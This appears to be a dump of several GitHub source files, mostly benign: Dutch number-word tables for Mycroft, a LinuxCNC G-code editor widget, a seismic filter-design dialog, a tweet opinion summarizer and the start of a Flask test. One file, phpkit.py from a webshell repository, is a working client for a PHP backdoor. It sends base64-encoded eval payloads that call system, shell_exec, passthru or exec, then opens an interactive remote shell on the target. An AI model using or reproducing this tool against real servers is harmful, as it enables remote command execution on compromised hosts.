repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
Dark5ide/mycroft-core | mycroft/util/lang/common_data_nl.py | 1 | 5932 | # -*- coding: utf-8 -*-
#
# Copyright 2019 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
_ARTICLES = {'de', 'het'}
_NUM_STRING_NL = {
0: 'nul',
1: 'een',
2: 'twee',
3: 'drie',
4: 'vier',
5: 'vijf',
6: 'zes',
7: 'zeven',
8: 'acht',
9: 'negen',
10: 'tien',
11: 'elf',
12: 'twaalf',
13: 'dertien',
14: 'veertien',
15: 'vijftien',
16: 'zestien',
17: 'zeventien',
18: 'achttien',
19: 'negentien',
20: 'twintig',
30: 'dertig',
40: 'veertig',
50: 'vijftig',
60: 'zestig',
70: 'zeventig',
80: 'tachtig',
90: 'negentig'
}
_FRACTION_STRING_NL = {
2: 'half',
3: 'derde',
4: 'vierde',
5: 'vijfde',
6: 'zesde',
7: 'zevende',
8: 'achtste',
9: 'negende',
10: 'tiende',
11: 'elfde',
12: 'twaalfde',
13: 'dertiende',
14: 'veertiende',
15: 'vijftiende',
16: 'zestiende',
17: 'zeventiende',
18: 'achttiende',
19: 'negentiende',
20: 'twintigste'
}
_LONG_SCALE_NL = OrderedDict([
(100, 'honderd'),
(1000, 'duizend'),
(1000000, 'miljoen'),
(1e12, "biljoen"),
(1e18, 'triljoen'),
(1e24, "quadriljoen"),
(1e30, "quintillion"),
(1e36, "sextillion"),
(1e42, "septillion"),
(1e48, "octillion"),
(1e54, "nonillion"),
(1e60, "decillion"),
(1e66, "undecillion"),
(1e72, "duodecillion"),
(1e78, "tredecillion"),
(1e84, "quattuordecillion"),
(1e90, "quinquadecillion"),
(1e96, "sedecillion"),
(1e102, "septendecillion"),
(1e108, "octodecillion"),
(1e114, "novendecillion"),
(1e120, "vigintillion"),
(1e306, "unquinquagintillion"),
(1e312, "duoquinquagintillion"),
(1e336, "sesquinquagintillion"),
(1e366, "unsexagintillion")
])
_SHORT_SCALE_NL = OrderedDict([
(100, 'honderd'),
(1000, 'duizend'),
(1000000, 'miljoen'),
(1e9, "miljard"),
(1e12, 'biljoen'),
(1e15, "quadrillion"),
(1e18, "quintiljoen"),
(1e21, "sextiljoen"),
(1e24, "septiljoen"),
(1e27, "octiljoen"),
(1e30, "noniljoen"),
(1e33, "deciljoen"),
(1e36, "undeciljoen"),
(1e39, "duodeciljoen"),
(1e42, "tredeciljoen"),
(1e45, "quattuordeciljoen"),
(1e48, "quinquadeciljoen"),
(1e51, "sedeciljoen"),
(1e54, "septendeciljoen"),
(1e57, "octodeciljoen"),
(1e60, "novendeciljoen"),
(1e63, "vigintiljoen"),
(1e66, "unvigintiljoen"),
(1e69, "uuovigintiljoen"),
(1e72, "tresvigintiljoen"),
(1e75, "quattuorvigintiljoen"),
(1e78, "quinquavigintiljoen"),
(1e81, "qesvigintiljoen"),
(1e84, "septemvigintiljoen"),
(1e87, "octovigintiljoen"),
(1e90, "novemvigintiljoen"),
(1e93, "trigintiljoen"),
(1e96, "untrigintiljoen"),
(1e99, "duotrigintiljoen"),
(1e102, "trestrigintiljoen"),
(1e105, "quattuortrigintiljoen"),
(1e108, "quinquatrigintiljoen"),
(1e111, "sestrigintiljoen"),
(1e114, "septentrigintiljoen"),
(1e117, "octotrigintiljoen"),
(1e120, "noventrigintiljoen"),
(1e123, "quadragintiljoen"),
(1e153, "quinquagintiljoen"),
(1e183, "sexagintiljoen"),
(1e213, "septuagintiljoen"),
(1e243, "octogintiljoen"),
(1e273, "nonagintiljoen"),
(1e303, "centiljoen"),
(1e306, "uncentiljoen"),
(1e309, "duocentiljoen"),
(1e312, "trescentiljoen"),
(1e333, "decicentiljoen"),
(1e336, "undecicentiljoen"),
(1e363, "viginticentiljoen"),
(1e366, "unviginticentiljoen"),
(1e393, "trigintacentiljoen"),
(1e423, "quadragintacentiljoen"),
(1e453, "quinquagintacentiljoen"),
(1e483, "sexagintacentiljoen"),
(1e513, "septuagintacentiljoen"),
(1e543, "ctogintacentiljoen"),
(1e573, "nonagintacentiljoen"),
(1e603, "ducentiljoen"),
(1e903, "trecentiljoen"),
(1e1203, "quadringentiljoen"),
(1e1503, "quingentiljoen"),
(1e1803, "sescentiljoen"),
(1e2103, "septingentiljoen"),
(1e2403, "octingentiljoen"),
(1e2703, "nongentiljoen"),
(1e3003, "milliniljoen")
])
_ORDINAL_STRING_BASE_NL = {
1: 'eerste',
2: 'tweede',
3: 'derde',
4: 'vierde',
5: 'vijfde',
6: 'zesde',
7: 'zevende',
8: 'achtste',
9: 'negende',
10: 'tiende',
11: 'elfde',
12: 'twaalfde',
13: 'dertiende',
14: 'veertiende',
15: 'vijftiende',
16: 'zestiende',
17: 'zeventiende',
18: 'achttiende',
19: 'negentiende',
20: 'twintigste',
30: 'dertigste',
40: "veertigste",
50: "vijftigste",
60: "zestigste",
70: "zeventigste",
80: "tachtigste",
90: "negentigste",
10e3: "honderdste",
1e3: "duizendste"
}
_SHORT_ORDINAL_STRING_NL = {
1e6: "miloenste",
1e9: "miljardste",
1e12: "biljoenste",
1e15: "biljardste",
1e18: "triljoenste",
1e21: "trijardste",
1e24: "quadriljoenste",
1e27: "quadriljardste",
1e30: "quintiljoenste",
1e33: "quintiljardste"
# TODO > 1e-33
}
_SHORT_ORDINAL_STRING_NL.update(_ORDINAL_STRING_BASE_NL)
_LONG_ORDINAL_STRING_NL = {
1e6: "miloenste",
1e9: "miljardste",
1e12: "biljoenste",
1e15: "biljardste",
1e18: "triljoenste",
1e21: "trijardste",
1e24: "quadriljoenste",
1e27: "quadriljardste",
1e30: "quintiljoenste",
1e33: "quintiljardste"
# TODO > 1e60
}
_LONG_ORDINAL_STRING_NL.update(_ORDINAL_STRING_BASE_NL)
| apache-2.0 |
cdsteinkuehler/linuxcnc | lib/python/gladevcp/hal_sourceview.py | 2 | 9831 | #!/usr/bin/env python
# vim: sts=4 sw=4 et
# GladeVcp actions
#
# Copyright (c) 2011 Pavel Shramov <shramov@mexmat.net>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
import os, time
import gobject, gtk
from hal_widgets import _HalWidgetBase
import linuxcnc
from hal_glib import GStat
from hal_actions import _EMC_ActionBase, _EMC_Action
from hal_filechooser import _EMC_FileChooser
import gtksourceview2 as gtksourceview
class EMC_SourceView(gtksourceview.View, _EMC_ActionBase):
__gtype_name__ = 'EMC_SourceView'
def __init__(self, *a, **kw):
gtksourceview.View.__init__(self, *a, **kw)
self.filename = None
self.mark = None
self.offset = 0
self.program_length = 0
self.buf = gtksourceview.Buffer()
self.buf.set_max_undo_levels(10)
self.update_iter()
self.buf.connect('changed', self.update_iter)
self.set_buffer(self.buf)
self.lm = gtksourceview.LanguageManager()
if 'EMC2_HOME' in os.environ:
path = os.path.join(os.environ['EMC2_HOME'], 'share/gtksourceview-2.0/language-specs/')
self.lm.set_search_path(self.lm.get_search_path() + [path])
self.buf.set_language(self.lm.get_language('.ngc'))
self.set_show_line_numbers(True)
self.set_show_line_marks(True)
self.set_highlight_current_line(True)
self.set_mark_category_icon_from_icon_name('motion', 'gtk-forward')
self.set_mark_category_background('motion', gtk.gdk.Color('#ff0'))
def _hal_init(self):
_EMC_ActionBase._hal_init(self)
self.gstat.connect('file-loaded', lambda w, f: gobject.timeout_add(1, self.load_file, f))
self.gstat.connect('line-changed', self.highlight_line)
self.gstat.connect('interp_idle', lambda w: self.set_line_number(0))
def set_language(self, lang, path = None):
# path = the search path for the langauage file
# if none, set to default
# lang = the lang file to set
if path == None:
path = os.path.join(os.environ['EMC2_HOME'], 'share/gtksourceview-2.0/language-specs/')
self.lm.set_search_path(path)
self.buf.set_language(self.lm.get_language(lang))
def get_filename(self):
return self.filename
# This load the file while not allowing undo buttons to unload the program.
# It updates the iter because iters become invalid when anything changes.
# We set the buffer-unmodified flag false after loading the file.
# Set the hilight line to the line linuxcnc is looking at.
# if one calls load_file without a filenname, We reload the exisiting file.
def load_file(self, fn=None):
self.buf.begin_not_undoable_action()
if fn == None:
fn = self.filename
self.filename = fn
if not fn:
self.buf.set_text('')
return
self.buf.set_text(open(fn).read())
self.buf.end_not_undoable_action()
self.buf.set_modified(False)
self.update_iter()
self.highlight_line(self.gstat, self.gstat.stat.motion_line)
self.offset = self.gstat.stat.motion_line
f = file(fn, 'r')
p = f.readlines()
f.close()
self.program_length = len(p)
# This moves the highlight line to a lower numbered line.
# useful for run-at-line selection
def line_down(self):
self.offset +=1
self.check_offset()
self.highlight_line(self.gstat, self.offset)
# This moves the highlight line to a higher numbered line.
# useful for run-at-line selection
def line_up(self):
self.offset -=1
self.check_offset()
self.highlight_line(self.gstat, self.offset)
def get_line_number(self):
return self.offset
# sets the highlight line to a specified line.
def set_line_number(self,linenum):
self.offset = linenum
self.check_offset()
self.highlight_line(self.gstat, self.offset)
def check_offset(self):
if self.offset < 0:
self.offset = 0
elif self.offset > self.program_length:
self.offset = self.program_length
def highlight_line(self, w, l):
self.offset = l
if not l:
if self.mark:
self.buf.delete_mark(self.mark)
self.mark = None
return
line = self.buf.get_iter_at_line(l-1)
if not self.mark:
self.mark = self.buf.create_source_mark('motion', 'motion', line)
self.mark.set_visible(True)
else:
self.buf.move_mark(self.mark, line)
self.scroll_to_mark(self.mark, 0, True, 0, 0.5)
# iters are invalid (and will cause a complete crash) after any changes.
# so we have to update them after a change
def update_iter(self,widget=None):
self.start_iter = self.buf.get_start_iter()
self.end_iter = self.buf.get_end_iter()
self.current_iter = self.start_iter.copy()
# This will search the buffer for a specified text string.
# You can search forward or back, with mixed case or exact text.
# if it searches to either end, if search is pressed again, it will start at the other end.
# This will grab focus and set the cursor active, while highlighting the line.
# It automatically scrolls if it must.
def text_search(self,direction=True,mixed_case=True,text="t"):
caseflag = 0
if mixed_case:
caseflag = gtksourceview.SEARCH_CASE_INSENSITIVE
if direction:
if self.current_iter.is_end():
self.current_iter = self.start_iter.copy()
found = gtksourceview.iter_forward_search(self.current_iter,text,caseflag, None)
else:
if self.current_iter.is_start():
self.current_iter = self.end_iter.copy()
found = gtksourceview.iter_backward_search(self.current_iter,text,caseflag, None)
if found:
match_start,match_end = found
self.buf.select_range(match_start,match_end)
if direction:
self.buf.place_cursor(match_start)
self.grab_focus()
self.current_iter = match_end.copy()
else:
self.buf.place_cursor(match_start)
self.grab_focus()
self.current_iter = match_start.copy()
self.scroll_to_iter(match_start, 0, True, 0, 0.5)
self.set_highlight_current_line(True)
else:
self.current_iter = self.start_iter.copy()
self.set_highlight_current_line(False)
# unndo one level of changes
def undo(self):
self.buf.undo()
# redo one level of changes
def redo(self):
self.buf.redo()
def safe_write(filename, data, mode=0644):
import os, tempfile
fd, fn = tempfile.mkstemp(dir=os.path.dirname(filename), prefix=os.path.basename(filename))
try:
os.write(fd, data)
os.close(fd)
fd = None
os.rename(fn, filename)
finally:
if fd is not None:
os.close(fd)
if os.path.isfile(fn):
os.unlink(fn)
class EMC_Action_Save(_EMC_Action, _EMC_FileChooser):
__gtype_name__ = 'EMC_Action_Save'
__gproperties__ = { 'textview' : (EMC_SourceView.__gtype__, 'Textview',
"Corresponding textview widget", gobject.PARAM_READWRITE),
}
def __init__(self, *a, **kw):
_EMC_Action.__init__(self, *a, **kw)
self.textview = None
def _hal_init(self):
_EMC_Action._hal_init(self)
def on_activate(self, w):
if not self.textview or not self.textview.filename:
return
self.save(self.textview.filename)
def save(self, fn):
b = self.textview.get_buffer()
b.set_modified(False)
safe_write(fn, b.get_text(b.get_start_iter(), b.get_end_iter()))
self._load_file(fn)
def do_set_property(self, property, value):
name = property.name.replace('-', '_')
if name == 'textview':
self.textview = value
else:
return _EMC_Action.do_set_property(self, property, value)
def do_get_property(self, property):
name = property.name.replace('-', '_')
if name == 'textview':
return self.textview
else:
return _EMC_Action.do_get_property(self, property)
class EMC_Action_SaveAs(EMC_Action_Save):
__gtype_name__ = 'EMC_Action_SaveAs'
def __init__(self, *a, **kw):
_EMC_Action.__init__(self, *a, **kw)
self.textview = None
self.currentfolder = os.path.expanduser("~/linuxcnc/nc_files")
def on_activate(self, w):
if not self.textview:
return
dialog = gtk.FileChooserDialog(title="Save As",action=gtk.FILE_CHOOSER_ACTION_SAVE,
buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
dialog.set_do_overwrite_confirmation(True)
dialog.set_current_folder(self.currentfolder)
if self.textview.filename:
dialog.set_current_name(os.path.basename(self.textview.filename))
dialog.show()
r = dialog.run()
fn = dialog.get_filename()
dialog.destroy()
if r == gtk.RESPONSE_OK:
self.save(fn)
self.currentfolder = os.path.dirname(fn)
| lgpl-2.1 |
a5216652166/webshell | php/phpkit-0.2a/phpkit.py | 26 | 3361 | #!/usr/bin/python
# Client for the php://input based backdoor
# Website: insecurety.net
# Author: infodox
# Twatter: @info_dox
# Insecurety Research - 2013
# version: 0.2a
import requests
import sys
if (len(sys.argv) != 2):
print "Usage: " + sys.argv[0] + " <url of backdoor>"
print "Example: " + sys.argv[0] + " http://localhost/odd.php"
sys.exit(0)
url = sys.argv[1]
tester = """echo w00tw00tw00t"""
testkey = """w00tw00tw00t"""
print "\n[+] URL in use: %s \n" %(url)
### ###
# Whole Bunch of Functions #
### ###
def genphp(func, cmd):
if func == "system":
rawphp = """system('%s');""" %(cmd)
elif func == "shellexec":
rawphp = """echo shell_exec('%s');""" %(cmd)
elif func == "passthru":
rawphp = """passthru('%s');""" %(cmd)
elif func == "exec":
rawphp = """echo exec('%s');""" %(cmd)
encodedphp = rawphp.encode('base64')
payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
return payload
def test(url, tester, testkey): # This whole function is ugly as sin
print "[+] Testing system()" # I need to make it tighter
payload = genphp('system', tester) # No, really. Look at the waste
r = requests.post(url, payload) # It could be TIIINY and fast!
if testkey in r.text:
print "[+] system() works, using system."
func = 'system'
return func
else:
print "[-] system() seems disabled :("
pass
print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
payload = genphp('shellexec', tester) # THIS COULD BE TINY
r = requests.post(url, payload) # But. Coffee is lacking
if testkey in r.text:
print "[+] shell_exec() works, using shell_exec"
func = 'shellexec'
return func
else:
print "[-] shell_exec() seems disabled :("
pass
print "[+] Testing passthru()"
payload = genphp('passthru', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] passthru() works, using passthru"
func = 'passthru'
return func
else:
print "[-] passthru() seems disabled :("
pass
print "[+] Testing exec()"
payload = genphp('exec', tester)
r = requests.post(url, payload)
if testkey in r.text:
print "[+] exec() works, using exec"
func = 'exec'
return func
else:
print "[-] exec() seems disabled :("
pass
### ###
# End of functions and object oriented stuff #
### ###
# the main body
func = test(url, tester, testkey)
while True:
try:
cmd = raw_input("shell:~$ ")
if cmd == "quit":
print "\n[-] Quitting"
sys.exit(0)
elif cmd == "exit":
print "\n[-] Quitting"
sys.exit(0)
else:
try:
payload = genphp(func, cmd)
hax = requests.post(url, payload)
print hax.text
except Exception or KeyboardInterrupt:
print "[-] Exception Caught, I hope"
sys.exit(0)
except Exception or KeyboardInterrupt:
print "[-] Exception or CTRL+C Caught, I hope"
print "[-] Exiting (hopefully) cleanly..."
sys.exit(0)
| gpl-3.0 |
jemromerol/apasvo | apasvo/gui/views/FilterDesing.py | 1 | 12915 | # encoding: utf-8
'''
@author: Jose Emilio Romero Lopez
@copyright: Copyright 2013-2014, Jose Emilio Romero Lopez.
@license: GPL
@contact: jemromerol@gmail.com
This file is part of APASVO.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from PySide import QtCore
from PySide import QtGui
import matplotlib
matplotlib.rcParams['backend'] = 'qt4agg'
matplotlib.rcParams['backend.qt4'] = 'PySide'
matplotlib.rcParams['patch.antialiased'] = False
matplotlib.rcParams['agg.path.chunksize'] = 80000
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from apasvo.gui.views import navigationtoolbar
from apasvo.gui.views import processingdialog
from apasvo.utils import clt
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import butter, lfilter, freqz
import numpy as np
import traceback
from apasvo.picking import apasvotrace as rc
from apasvo.picking import takanami
from apasvo._version import _application_name
from apasvo._version import _organization
MINIMUM_MARGIN_IN_SECS = 0.5
class FilterDesignTask(QtCore.QObject):
"""A class to handle a Takanami exec. task.
Attributes:
record: An opened seismic record.
start: Start point of the signal segment where
the algorithm is going to be applied.
end: End point of the signal segment where
the algorithm is going to be applied.
Signals:
finished: Task finishes.
position_estimated: Return values of Takanami method are ready.
"""
finished = QtCore.Signal()
error = QtCore.Signal(str, str)
position_estimated = QtCore.Signal(int, np.ndarray, int)
def __init__(self, record):
super(FilterDesignTask, self).__init__()
self.record = record
class FilterDesignDialog(QtGui.QDialog):
"""A dialog to apply Takanami's AR picking method to a selected piece of a
seismic signal.
Attributes:
document: Current opened document containing a seismic record.
seismic_event: A seismic event to be refined by using Takanami method.
If no event is provided, then a new seismic event will be created
by using the estimated arrival time after clicking on 'Accept'
"""
def __init__(self, stream, trace_list=None, parent=None):
super(FilterDesignDialog, self).__init__(parent)
# Calc max. frequency
traces = stream.traces if not trace_list else trace_list
self.max_freq = max([trace.fs for trace in traces])
self._init_ui()
self.load_settings()
# Initial draw
w, h_db, angles = self._retrieve_filter_plot_data()
self._module_data = self.module_axes.plot(w, h_db, 'b')[0]
self._phase_data = self.phase_axes.plot(w, angles, 'g')[0]
self.module_axes.set_ylim([-60,10])
self.phase_axes.set_ylim([min(angles), max(angles)])
self.canvas.draw_idle()
self.start_point_spinbox.valueChanged.connect(self.on_freq_min_changed)
self.end_point_spinbox.valueChanged.connect(self.on_freq_max_changed)
self.start_point_spinbox.valueChanged.connect(self._draw_filter_response)
self.end_point_spinbox.valueChanged.connect(self._draw_filter_response)
self.number_coefficient_spinbox.valueChanged.connect(self._draw_filter_response)
self.zeroPhaseCheckBox.toggled.connect(self._draw_filter_response)
self.button_box.accepted.connect(self.accept)
self.button_box.rejected.connect(self.reject)
self.button_box.clicked.connect(self.on_click)
def _init_ui(self):
self.setWindowTitle("Filter Design (Butterworth-Bandpass Filter)")
self.fig, _ = plt.subplots(1, 1, sharex=True)
# Set up filter axes
self.module_axes = self.fig.axes[0]
self.phase_axes = self.module_axes.twinx()
self.module_axes.set_title('Digital filter frequency response (Butterworth-Bandpass filter)')
self.module_axes.set_xlabel('Frequency [Hz]')
self.module_axes.set_ylabel('Amplitude [dB]', color='b')
self.module_axes.axis('tight')
self.module_axes.grid(which='both', axis='both')
self.phase_axes.set_ylabel('Angle (radians)', color='g')
self.canvas = FigureCanvas(self.fig)
self.canvas.setMinimumSize(self.canvas.size())
self.canvas.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Policy.Expanding,
QtGui.QSizePolicy.Policy.Expanding))
self.toolBarNavigation = navigationtoolbar.NavigationToolBar(self.canvas, self)
self.group_box = QtGui.QGroupBox(self)
self.group_box2 = QtGui.QGroupBox(self)
self.group_box3 = QtGui.QGroupBox(self)
self.group_box4 = QtGui.QGroupBox(self)
self.group_box.setTitle("")
self.group_box2.setTitle("")
self.group_box3.setTitle("Parameters")
self.start_point_label = QtGui.QLabel("Lower cutoff frequency (Hz): ")
self.start_point_label.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Policy.Maximum,
QtGui.QSizePolicy.Policy.Preferred))
self.start_point_spinbox = QtGui.QDoubleSpinBox(self.group_box)
self.start_point_spinbox.setMinimum(1.0)
self.start_point_spinbox.setSingleStep(1.00)
self.start_point_spinbox.setAccelerated(True)
self.start_point_spinbox.setMaximum(self.max_freq * 0.5)
self.end_point_label = QtGui.QLabel("Higher cutoff frequency (Hz):")
self.end_point_label.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Policy.Maximum,
QtGui.QSizePolicy.Policy.Preferred))
self.end_point_spinbox = QtGui.QDoubleSpinBox(self.group_box4)
self.end_point_spinbox.setMinimum(1.0)
self.end_point_spinbox.setSingleStep(1.00)
self.end_point_spinbox.setAccelerated(True)
self.end_point_spinbox.setMaximum(self.max_freq * 0.5)
self.end_point_spinbox.setValue(5.0)
#######################################################################
self.number_coefficient_label = QtGui.QLabel("Order: ")
self.number_coefficient_label2 = QtGui.QLabel("")
self.number_coefficient_label.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Policy.Maximum,
QtGui.QSizePolicy.Policy.Preferred))
self.number_coefficient_label2.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Policy.Maximum,
QtGui.QSizePolicy.Policy.Preferred))
self.number_coefficient_spinbox = QtGui.QSpinBox(self.group_box3)
self.number_coefficient_spinbox.adjustSize()
self.number_coefficient_spinbox.setMinimum(1)
self.number_coefficient_spinbox.setSingleStep(1)
self.number_coefficient_spinbox.setAccelerated(True)
self.zeroPhaseCheckBox = QtGui.QCheckBox("Zero phase filtering", self.group_box2)
self.zeroPhaseCheckBox.setChecked(True)
#######################################################################
self.group_box_layout = QtGui.QHBoxLayout(self.group_box)
self.group_box_layout.setContentsMargins(9, 9, 9, 9)
self.group_box_layout.setSpacing(12)
self.group_box_layout.addWidget(self.start_point_label)
self.group_box_layout.addWidget(self.start_point_spinbox)
self.group_box4_layout = QtGui.QHBoxLayout(self.group_box4)
self.group_box4_layout.setContentsMargins(9, 9, 9, 9)
self.group_box4_layout.setSpacing(12)
self.group_box4_layout.addWidget(self.end_point_label)
self.group_box4_layout.addWidget(self.end_point_spinbox)
#####################################################################
self.group_box2_layout = QtGui.QHBoxLayout(self.group_box2)
self.group_box2_layout.setContentsMargins(9, 9, 9, 9)
self.group_box2_layout.setSpacing(12)
self.group_box2_layout.addWidget(self.zeroPhaseCheckBox)
###################################################################
self.group_box3_layout = QtGui.QHBoxLayout(self.group_box3)
self.group_box3_layout.setContentsMargins(9, 9, 9, 9)
self.group_box3_layout.setSpacing(12)
self.group_box3_layout.addWidget(self.number_coefficient_label)
self.group_box3_layout.addWidget(self.number_coefficient_spinbox)
self.group_box3_layout.addWidget(self.number_coefficient_label2)
#####################################################################
self.button_box = QtGui.QDialogButtonBox(self)
self.button_box.setOrientation(QtCore.Qt.Horizontal)
self.button_box.setStandardButtons(QtGui.QDialogButtonBox.Apply |
QtGui.QDialogButtonBox.Cancel |
QtGui.QDialogButtonBox.Ok)
self.layout = QtGui.QVBoxLayout(self)
self.layout.setContentsMargins(9, 9, 9, 9)
self.layout.setSpacing(6)
self.layout.addWidget(self.toolBarNavigation)
self.layout.addWidget(self.canvas)
self.layout.addWidget(self.group_box3)
self.layout.addWidget(self.group_box)
self.layout.addWidget(self.group_box4)
#self.layout.addWidget(self.group_box2)
self.layout.addWidget(self.zeroPhaseCheckBox)
self.layout.addWidget(self.button_box)
def on_freq_min_changed(self, value):
self.end_point_spinbox.setMinimum(value + 1.0)
def on_freq_max_changed(self, value):
self.start_point_spinbox.setMaximum(value - 1.0)
def on_click(self, button):
if self.button_box.standardButton(button) == QtGui.QDialogButtonBox.Ok:
self.save_settings()
if self.button_box.standardButton(button) == QtGui.QDialogButtonBox.Apply:
self._draw_filter_response()
def save_settings(self):
"""Save settings to persistent storage."""
settings = QtCore.QSettings(_organization, _application_name)
settings.beginGroup("filterdesign_settings")
#self.default_margin = int(float(settings.value('filterdesign_margin', 5.0)) *
#self.record.fs)
settings.setValue('freq_min', self.start_point_spinbox.value())
settings.setValue('freq_max', self.end_point_spinbox.value())
settings.setValue('coef_number', self.number_coefficient_spinbox.value())
settings.setValue('zero_phase', self.zeroPhaseCheckBox.isChecked())
settings.endGroup()
def load_settings(self):
"""Loads settings from persistent storage."""
settings = QtCore.QSettings(_organization, _application_name)
settings.beginGroup("filterdesign_settings")
self.start_point_spinbox.setValue(float(settings.value('freq_min', 0.0)))
self.end_point_spinbox.setValue(float(settings.value('freq_max', self.max_freq * 0.5)))
self.number_coefficient_spinbox.setValue(int(settings.value('coef_number', 1)))
self.zeroPhaseCheckBox.setChecked(bool(settings.value('zero_phase', True)))
settings.endGroup()
def _butter_bandpass(self, lowcut, highcut, fs, order=5):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = butter(order, [low, high], btype='band')
return b, a
def _retrieve_filter_plot_data(self):
b, a = self._butter_bandpass(self.start_point_spinbox.value(), self.end_point_spinbox.value(), self.max_freq, order=self.number_coefficient_spinbox.value())
#w, h = freqz(b, a)
w, h = freqz(b, a,1024)
angles = np.unwrap(np.angle(h))
#return (self.max_freq * 0.5 / np.pi) * w, 20 * np.log10(abs(h)), angles
f= (self.max_freq/2)*(w/np.pi)
return f, 20 * np.log10(abs(h)), angles
def _draw_filter_response(self, *args, **kwargs):
w, h_db, angles = self._retrieve_filter_plot_data()
self._module_data.set_xdata(w)
self._module_data.set_ydata(h_db)
self._phase_data.set_xdata(w)
self._phase_data.set_ydata(angles)
self.phase_axes.set_ylim([min(angles), max(angles)])
self.canvas.draw_idle()
| gpl-3.0 |
pxmars/text-mining-project | src/opinion_summarization.py | 1 | 4866 | import operator
def summarize(opinions, aspects, file):
"""
Given a list of opinions and aspects, write the aspect-based opinion summary to a file
:param opinions:
:param aspects:
:param file:
:return: void
"""
opinions.sort(key=lambda x: x.targetAspect, reverse=False) # sort the list of opinions
# according to the targetAspect attribute
# here all opinion objects with the same target aspect are occurring one after another in a sequential manner
# for opinion in Opinions:
# print(opinion, file=file)
list_entities = ['cdu', 'spd', 'linke', 'grüne', 'csu', 'fdp', 'afd'] # store the list of entities
currentAspect = "" # holding the aspect for the current iteration
idx_pos = dict() # holding the list of tweets text that have positive sentiment value for the current aspect
idx_neg = dict() # holding the list of tweets text that have negative sentiment value for the current aspect
perc_pos = dict() # holding the number of positive tweets for each entity and the current aspect
perc_neg = dict() # holding the number of negative tweets for each entity and the current aspect
cnt_pos = 0 # holding the total number of positive tweets for the current aspect
cnt_neg = 0 # holding the total number of negative tweets for the current aspect
cnt = 0 # counter over the list of opinions
for aspect in aspects: # initialize both dictionaries
idx_pos[aspect] = []
idx_neg[aspect] = []
for opinion in opinions: # iterate over the list of opinions
if (currentAspect != opinion.getTargetAspect() and cnt != 0) or cnt == len(opinions) - 1:
# in case we move from the current aspect to the next one or the current aspect is the last one to process
print("When it comes to " + currentAspect + ":", file=file)
sorted_perc_pos = sorted(perc_pos.items(), key=operator.itemgetter(1), reverse=True)
# sort the list of positive tweets for each entity in decreasing order to get the entity that has
# the largest number of votes first
for e, n in sorted_perc_pos[:3]:
perc = int(n / float(cnt_pos) * 100) # compute the percentage of votes for the entity e with regards
# to the current aspect
print(str(perc) + "% of twitters are preferring " + e, file=file)
if len(idx_pos[currentAspect]) > 0:
print('\n', file=file)
print("Here are what twitters liked about political parties vision to " + currentAspect, file=file)
if len(idx_pos[currentAspect]) > 3: # keep the 3 first positive tweets having
# the current aspect as subject
idx_pos[currentAspect] = idx_pos[currentAspect][:3]
for tweet in idx_pos[currentAspect]:
print(tweet, file=file)
if len(idx_neg[currentAspect]) > 0:
print('\n', file=file)
print("Here are what tweeters disliked about " + currentAspect, file=file)
if len(idx_neg[currentAspect]) > 3: # keep the 3 first negative tweets having
# the current aspect as subject
idx_neg[currentAspect] = idx_neg[currentAspect][:3]
for tweet in idx_neg[currentAspect]:
print(tweet, file=file)
# reinitialize counters
cnt_pos = 0
cnt_neg = 0
print('\n' + '\n' + '\n', file=file)
if currentAspect != opinion.getTargetAspect(): # reinitialize counters of each entity when moving
# to another aspect
for item in list_entities:
perc_pos[item] = 0
perc_neg[item] = 0
cnt += 1 # increment the counter over the list of opinions
currentAspect = opinion.getTargetAspect() # update the current aspect
tweet_text = opinion.getText() # holding the text for the current opinion
if opinion.getSO() == 1: # if the sentiment value for the current opinion is positive
cnt_pos += 1 # increment the counter for positive tweets
perc_pos[opinion.getTargetEntity()] += 1 # increment the counter for positive tweets for the current entity
if len(tweet_text) > 80:
idx_pos[currentAspect].append(opinion.getText()) # store the text of the tweet
elif opinion.getSO() == -1: # if the sentiment value for the current opinion is negative
cnt_neg += 1 # increment the counter for negative tweets
perc_neg[opinion.getTargetEntity()] += 1 # increment the counter for negative tweets for the current entity
if len(tweet_text) > 80:
idx_neg[currentAspect].append(opinion.getText()) # store the text of the tweet
| mit |
ddayguerrero/blogme | flask/lib/python3.4/site-packages/flask/testsuite/templating.py | 562 | 11237 | # -*- coding: utf-8 -*-
"""
flask.testsuite.templating
~~~~~~~~~~~~~~~~~~~~~~~~~~
Template functionality
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import flask
import unittest
from flask.testsuite import FlaskTestCase
